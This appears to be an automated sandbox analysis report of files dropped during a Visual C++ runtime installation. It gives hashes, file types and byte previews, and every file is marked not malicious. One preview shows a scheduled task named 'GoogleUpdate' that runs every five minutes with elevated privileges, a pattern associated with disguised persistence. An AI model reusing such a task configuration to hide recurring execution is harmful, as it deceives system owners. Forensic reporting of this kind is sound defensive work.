                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2022-11-11T20:23:14.4975841</Date>.. <URI>GoogleUpdate</URI>.. </RegistrationInfo>.. <Triggers>.. <CalendarTrigger>.. <Repetition>.. <Interval>PT5M</Interval>.. <Duration>P1D</Duration>.. <StopAtDurationEnd>false</StopAtDurationEnd>.. </Repetition>.. <StartBoundary>2022-11-11T20:19:58</StartBoundary>.. <Enabled>true</Enabled>.. <ScheduleByDay>.. <DaysInterval>1</DaysInterval>.. </ScheduleByDay>.. </CalendarTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>.. <StopIfGoingOnBa
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):7461
                                                                        Entropy (8bit):5.745539580873089
                                                                        Encrypted:false
                                                                        SSDEEP:96:eLPdlu3dyb52HwxJi84V5YJs0sM2CfoghyXy2awF8M8M8M8M8M8M8M8M8M8M8M8v:ytb52eix5YiBM2CfKkpmbZi9VWM
                                                                        MD5:86A05C5C436948DC73AD40C54D4C2494
                                                                        SHA1:7B76314437741C57771EC20E174E160817F4F213
                                                                        SHA-256:14D536F20E081DE30CABC384E5B2E516D9B743361A6138FD9F5755A32B7BC10C
                                                                        SHA-512:DD438CC9504BC3FDE3FB17E0A55528118E44C38F198F9B574DDCDDE8DD027AEEFA51D8E50AADCA0ACA64BBC370F236D0CE79FAC88CF005543AFDC5A06AED8048
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@j|"V.@.....@.....@.....@.....@.....@......&.{12578975-C765-4BDF-8DDC-3284BC0E855F}>.Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702..vc_runtimeAdditional_x64.msi.@.....@6l...@.....@........&.{23CC48B5-925F-41A3-A3E4-90BCB78D5374}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{9B0BAA88-E15F-3A1F-ACC0-B206E9DDF71C}....&.{23CC48B5-925F-41A3-A3E4-90BCB78D5374}c.&.{9B0BAA88-E15F-3A1F-ACC0-B206E9DDF71C}............ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}&.{12578975-C765-4BDF-8DDC-3284BC0E855F}..&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}...@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}&.{12578975-C765-4BDF-8DDC-3284BC0E855F}..&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}...@.....@...
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):12286
                                                                        Entropy (8bit):5.61597871082654
                                                                        Encrypted:false
                                                                        SSDEEP:192:y2Yk5mQrtONHWxSQjmxmY2Cg3gOgugmg8nBgkcg2gogDwgAeAS43RaB1iQDe2mk3:y2pjZONHW0QjmxmY2vv2Va6WjWA
                                                                        MD5:D54F6311F4C0D56630D544450A4AB7F3
                                                                        SHA1:0621E16FA35E1DC406C975CD9773F8135F1DCD2D
                                                                        SHA-256:0EC5B68A739A374B8FD576E983CA41E625DAE7C452BD6D07CB5D6C2468BAA9E6
                                                                        SHA-512:85A7FE6555D42EE9572533E4A5E68A06F4533D42C9471FC40AA5B4C1E537EC812BB8FD208921A27D411B5E374C3C02B23B8D867B5CD9FEABE89C320397A6E34E
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@j|"V.@.....@.....@.....@.....@.....@......&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}>.Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931..vc_runtimeAdditional_x64.msi.@.....@.|"..@.....@........&.{4031CBD1-E566-49F4-B008-5D35253621AE}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}@.02:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}@.22:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{99A922E3-648F-3C37-8AE6-78232F317B1E}..C:\Windows\system32\mfc140.dll.@.......@.....@.....@......&.{8924DA15-E863-388D-A06B-E7A3931AD77B}..C:\Windows\system32\mfc1
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6384
                                                                        Entropy (8bit):5.786100854933264
                                                                        Encrypted:false
                                                                        SSDEEP:96:HLADpJNSDp47mkK/U6Ul8M8M8M8M8M8M8M8M8ePB8AhMpfSeeDpFCOSeeDpFhlEc:r6N2PoslWE
                                                                        MD5:C06A8FDB19CADD30F64E21FDF52FE673
                                                                        SHA1:79E4A395009B272C22A4A2BC3BC5E713D7C27CAF
                                                                        SHA-256:4B1E9C86D270202F8FD55D46394975382CE448EA94FC7E93EC7035C726CBE472
                                                                        SHA-512:C7550603A4AB7A1FDD172088BE1E10CC3F826D7DFE597A9638C65A4F480D7E605ECB16C646DAA57FAE6CB28AD3DB22A1126243A28EFBC27585081B429F1B7E85
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@a|"V.@.....@.....@.....@.....@.....@......&.{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6};.Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702..vc_runtimeMinimum_x64.msi.@.....@6l...@.....@........&.{5A9DDDD3-76A3-46B4-95D5-90B8CD9429D8}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{36F68A90-239C-34DF-B58C-64B30153CE35}....&.{5A9DDDD3-76A3-46B4-95D5-90B8CD9429D8}c.&.{36F68A90-239C-34DF-B58C-64B30153CE35}............ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}&.{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}..&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}...@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}&.{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}..&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}...@.....@......&.{03C
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):9598
                                                                        Entropy (8bit):5.687525568223914
                                                                        Encrypted:false
                                                                        SSDEEP:96:mLpZpygqZpN050hkbX7EdgEnUygtE8M8M8M8M8M8M8M8M8M8M8VKW40QyfUV5evP:aBmYTNl7bMVGTbheRaWm
                                                                        MD5:20A919E955A32FF6928028D87C0BA56E
                                                                        SHA1:B125BEE19819ABEAE5D95DCC39B4BB88C5A2E237
                                                                        SHA-256:C14527E55B639094BAC049A28EE9ABECE57186F8675287586830F496D03B092B
                                                                        SHA-512:0A2E8464D4A17CEA2093F5D1B51597A7733049F804491B12BFB79CAADBEA8C75C9C5B5281F89D254F2F93D9D077D2EB445671724E90EFCF036FBEBBC1CDFDF63
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@b|"V.@.....@.....@.....@.....@.....@......&.{CF4C347D-954E-4543-88D2-EC17F07F466F};.Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931..vc_runtimeMinimum_x64.msi.@.....@.|"..@.....@........&.{F4326D14-4FF5-4F81-B678-481B19EBBB51}.....@.....@.....@.....@.......@.....@.....@.......@....;.Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}@.02:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}@.22:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{B33258FD-750C-3B42-8BE4-535B48E97DB4}$.C:\Windows\system32\vcruntime140.dll.@.......@.....@.....@......&.{2427B123-F132-4F0B-A958-50F7CDFCAA56}&.C:\Windows\system32\vcrunti
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.2061864215682299
                                                                        Encrypted:false
                                                                        SSDEEP:12:JSbX72FjDkXAlfLIlHuRpZhG7777777777777777777777777ZDHFsmgsaQ48QGE:JAUIwElgsvxpcF
                                                                        MD5:8EE1FF2CF76B68952EE84ECE42A7C20C
                                                                        SHA1:E6D7C3B46F3FD41570D287625C8CB78A8A85C375
                                                                        SHA-256:05AF8BE6241B58D1346ACD034150A4BA93382E28F82ECA0553EA1215DDE40368
                                                                        SHA-512:5E92A7A0CA1069026C9E211D417DE8E3FBDE117B362BE0866374E19AE1336CAC452D9D050F8A818523403225493D41BE0E0BB02253F4F544F8C71EFF4A6103E7
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.2078711284846801
                                                                        Encrypted:false
                                                                        SSDEEP:12:JSbX72FjxcXAlfLIlHuRpWBhG7777777777777777777777777ZDHFTVdMceFBJJ:J2UIwUi5venJCcF
                                                                        MD5:136F9CB4226201D8EEBA93142158B9A8
                                                                        SHA1:1266049C705C2682555F6B2FFDFC3A213500E3EF
                                                                        SHA-256:C55C342A42F8A3C7A509289A68CDB1E433375FD88EAF93B0A2030819A2600AE8
                                                                        SHA-512:793A12ACF7C96A3D215F8C45AB6D4B4013BC49C446E7028E0EF339136A1A8373DBDA7F40D792F539AFD3FA99F75D9FE44933E3F76CBE2C84D1A3F5EE51423B17
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):1.5638666227546747
                                                                        Encrypted:false
                                                                        SSDEEP:48:x8PhruRc06WXi7FT5XhdO6I6RLjxL3m4S26NRSc8k0SIVoZMc9d:Mhr11FTd8aLVL3zyREfJoZMc
                                                                        MD5:01077FAD9CBC96BD8733EEF5BC7C3E9A
                                                                        SHA1:48C3949FEF321FE01B49CF2766FD22EC6F4A4B92
                                                                        SHA-256:7A60B5E0B869C6A9BC222DE88D686151CC4BF8D39054648E5E6C7835BA6020F2
                                                                        SHA-512:12E7FE05916FE420EF9138CA152D0CBE79E9677475E68A45DD41AC0F60EE97ECA0417596E6259E27B70D5872391A70C373374479F6E20B64C9BECE822D50623C
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):120125
                                                                        Entropy (8bit):5.369060473273418
                                                                        Encrypted:false
                                                                        SSDEEP:768:NSXZf5Y2mhq+Lswt33IyCr7el3OEmSoay55QIxVV9lQ2es9YU/tYcxywq9D+crL0:NSc2mhbT1pAcuY8
                                                                        MD5:69D65D00525992B804A44984863AD86A
                                                                        SHA1:8441EE9F10AFC26C8C30D2359C43F81626684FBA
                                                                        SHA-256:17378F96225F66C7D0122838135785B87F3DE6E8A190659352F3706B52ECC5BB
                                                                        SHA-512:8444CE34FFE30D4114B8D0ADA812A7DB29B61D677FECB6F8A1BDFE1941B28AE683E0AE9F5788DBC361939316C4AFEFAB5EC306393B67DA2F152451F640AB028F
                                                                        Malicious:false
                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 11:01:16.006 [3252]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:16.021 [3252]: ngen returning 0x00000000..07/23/2020 11:01:16.068 [1236]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:16.084 [1236]: ngen returning 0x00000000..07/23/2020 11:01:16.131 [4512]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Excel.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 1
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):327504
                                                                        Entropy (8bit):6.355017459054054
                                                                        Encrypted:false
                                                                        SSDEEP:6144:NVb1XM3VzY+Ug3yxpzrxIQVpJOWvYGCs8yFnWzghIGAu428z:jBc3VYZxxrxq9ze47z
                                                                        MD5:C11DC6779E2DC5A4620FBE1BF306D720
                                                                        SHA1:04DEA1CBBAB2A939578544056EB7818E9D7CD3CB
                                                                        SHA-256:0CE53545B7D6E1FE5451DF4822D3D59B6806C00D0C69C0813E7A4EFC2CF92A86
                                                                        SHA-512:C1E422E42825BBCDDD2E8A73204B23AEAEC2520E882B8583347B925A4695151998BA96798FDF68F2A5838B985FC230A3DCD254A8EAFC43704E6190A612992C6D
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-..lii.?ii.?ii.?...>ki.?`..?ci.?&..>ni.?ii.?.i.?&..>ai.?&..>mi.?&..><i.?&..>hi.?&.s?hi.?&..>hi.?Richii.?................PE..d....@............" ..."............................................................l.....`A.............................................M...+...................6......PO......x...p5..p...........................04..@............................................text...\........................... ..`.rdata...M.......N..................@..@.data....@...@...:..................@....pdata...6.......8...h..............@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5625152
                                                                        Entropy (8bit):6.746793773162767
                                                                        Encrypted:false
                                                                        SSDEEP:49152:6ORAY4XUjURKpEaGKgTPiNHtkHqYF95zExbVLE1pf8s7CT1u+wvqPDne4vpR6uSz:prVpHqvKnfJeFLOAkGkzdnEVomFHKnPY
                                                                        MD5:A0372BFFC29E5FE5F07969154E713210
                                                                        SHA1:706AA77C117C8B1D8D510A5A29D05FCD1E33EA21
                                                                        SHA-256:0F0803E6355698D992AD257853577D60E064D55BF570B9B8B299315E8C6088E4
                                                                        SHA-512:0FE574C6B199C04F323EBF37D599A79F2A953AA3F1F19512679D7B5D0EFC18074CFDED54B6D762D019B8AA6134FA60342793C53D42250A9750B7563AF3B4A88A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}v.d.%.d.%.d.%!..$.d.%!..$.d.%!..$.d.%...%.d.%...$.d.%...$.d.%!..$.d.%.d.%.`.%...$.d.%...$.d.%...$he.%...$.d.%...%.d.%...$.d.%Rich.d.%................PE..d...-............." ..."..,...(.......,...................................... V.......U...`A.........................................L:.d...T(;.......?.`.....<..6....U.@O....T. o...L5.p............................@..@.............-..... 9:......................text...l.,.......,................. ..`.rdata...~....-.......,.............@..@.data....4....;......r;.............@....pdata...6....<..8...@<.............@..@.didat..H.....?......x>.............@....rsrc...`.....?......~>.............@..@.reloc.. o....T..p....T.............@..B................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):51016
                                                                        Entropy (8bit):6.301194450733097
                                                                        Encrypted:false
                                                                        SSDEEP:768:jdzvsXMQ9tLkr8yTby97DVL4HdRmuU9z1kKXRmuU9z7NT:hz0XMQ9tLU8CbyBVLS3d8z1bBd8z79
                                                                        MD5:F048B2C27FB6B2E1C076A29978CF1B95
                                                                        SHA1:D3CF168D1D0C707F4B73063AB0883B0981FE7E4E
                                                                        SHA-256:6DCE3907366FF863B06AEBE3B6D15B660E021E202982C8ACD92BBBF76BEB59A1
                                                                        SHA-512:37A6090C1BC1D2136E8C5FD265438025970CC048837B148F62AE7236A0B100058CB646957E9E74A60C0A08187DFC9526C4F3359376056CFFEAB7FBFE3087EFBC
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d.....(..........." ...".....v............................................................`A......................................................... ...s...........x..HO..............p............................................................................rdata..t...........................@..@.rsrc....s... ...t..................@..@......(.........X.................(.........l.................(.........$...L...L.........(.............p...p...........................RSDS.0^....N.]..4......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140CHS.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1...a...rsrc$02.... ....0^....N.]..4..K\......0.7..(.........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):51024
                                                                        Entropy (8bit):6.340536874095089
                                                                        Encrypted:false
                                                                        SSDEEP:768:VLfucVI4qc7kYw4JUM3i/EhWfHklkrRmuU9zlmKiRmuU9z3Z:lucVI4qc4YJUM3XhWPqk1d8zfMd8zJ
                                                                        MD5:AA67075052FC3EEA447B9F6AEFB819E4
                                                                        SHA1:2ED81FD56E9BBBC1FF4E3B94814C596F2CE9AD3B
                                                                        SHA-256:4C8D2A09D2E54A7BE08EE75CC10A64ECF606F21102DD9EAB6F8DABE9492B4E80
                                                                        SHA-512:14025A6E1932C91F3CBBBEFBEF810A41E34F6C9BAB6CC31D8BDEC62E73DA6581098FE3FD52B82FBF0B87F089B34D14EA1F1BD7A7BFDEC6ACF4F24065B31C34ED
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...g'z..........." ...".....v...........................................................`A......................................................... ..8s...........x..PO..............p............................................................................rdata..t...........................@..@.rsrc...8s... ...t..................@..@....g'z.........X...............g'z.........l...............g'z.........$...L...L.......g'z.............p...p...........................RSDS.$.>...DU..T.Q.....D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140CHT.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1...a...rsrc$02.... ....$.>...DU..T.Q...Q._.H..n.g'z.........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):79696
                                                                        Entropy (8bit):4.975420142902263
                                                                        Encrypted:false
                                                                        SSDEEP:1536:/VPidQr0UZqnn0BDn9PS6VFaGCWKZ+e0petNSaBhp0vcsjsr8gWb8C1dCuf9tcz+:/VidQr0UZqnnSn9PS6VFaGCWKZX0Whpk
                                                                        MD5:39B93D80438E8502EF6BFFFE7A3E90C0
                                                                        SHA1:4EC67C81D7E07E26A785D554F0C04F2560E09BCA
                                                                        SHA-256:2F0E08B7C4F5EF6B2EB3D447385C5E8B5B05AE4897993DC4CB79188B1EC3300A
                                                                        SHA-512:58670741FC42EF0DE3FF54B16533C4217610C809AE8EADD3D3605261286C18DEEB7252751517FE1F3A6B1503BC3C33C88A7CBE10242B018E3AF4ADBD1045CAF1
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d.....f..........." ..."............................................................e.....`A......................................................... ..0...............PO..............p............................................................................rdata..t...........................@..@.rsrc...0.... ......................@..@......f.........X.................f.........l.................f.........$...L...L.........f.............p...p...........................RSDS.....1\....u}......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140DEU.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02.... ........1\....u}../...:;!4f5t...f.........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):69968
                                                                        Entropy (8bit):5.131704941361196
                                                                        Encrypted:false
                                                                        SSDEEP:768:wUVGijcBEhCgy6rAu1HLPLNqyf/nWHBNhdBU2fd5gH8UHg9zG2KPj8g9zGI:/V9zfy6rAuhPLNXf/nWHNfdo8/z6PzZ
                                                                        MD5:F93CC93C178EE0D0DCEC72B6590837B7
                                                                        SHA1:D850AA17E90EAA85505B01191B9B4012CDF37DE6
                                                                        SHA-256:2368B5905DF1D205C956EC94594491241C2B83FD0D22928DFBE1CE7B1657ABE2
                                                                        SHA-512:623BEF9CE6A83A2576CF32E620767AD7DBC8A5C04C48D896B436F60D4A34D56BB44514079AFD6F1580018791D486EE5102C329682F9372AFA514232A4002F209
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D=.]%S.]%S.]%S..Y..\%S..YQ.\%S.Rich]%S.PE..d...-..w.........." ..."..................................................................`A......................................................... ..................PO..............p............................................................................rdata..t...........................@..@.rsrc........ ......................@..@....-..w........X...............-..w........l...............-..w........$...L...L.......-..w............p...p...........................RSDS.(..[......(.......D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ENU.amd64.pdb.........p....rdata..p........rdata$voltmd............rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02.... ....(..[......(...D..>........-..w........................................................................................................................
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):78672
                                                                        Entropy (8bit):4.95404690674315
                                                                        Encrypted:false
                                                                        SSDEEP:1536:gwq6A16B/iKuFm3OKWxRZ/I2+f9Xzu16ttf9Xzut:gwc8B/+HIZf9X4ctf9Xy
                                                                        MD5:7AB83D5CFE5E24FA6ACFD110E2F3DCC7
                                                                        SHA1:F5E7110333D6EEDC511E815FE6DE39856D5F60B9
